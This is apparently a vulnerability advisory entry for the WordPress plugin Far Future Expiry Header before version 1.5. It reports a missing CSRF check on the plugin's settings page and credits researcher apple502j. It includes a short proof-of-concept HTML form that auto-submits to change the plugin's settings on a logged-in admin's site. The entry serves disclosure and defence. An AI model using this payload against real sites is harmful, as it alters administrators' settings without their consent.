WordPress Plugin Vulnerabilities
Far Future Expiry Header < 1.5 - Plugin's Settings Update via CSRF
Description
The plugin does not have CSRF check when saving its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.
Proof of Concept
<form action="https://example.com/wp-admin/options-general.php?page=ffe_plugin_options" method="post" id="csrf"> <input type="hidden" name="enable-ffe" value="on"> <input type="hidden" name="num-expiry-days" value="1"> <input type="hidden" name="ffe-png" value="on"> <input type="hidden" name="ffe_save_settings" value="1"> </form><script>csrf.submit()</script>
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-10-04 (about 2 years ago)
Added
2021-10-04 (about 2 years ago)
Last Updated
2022-04-15 (about 2 years ago)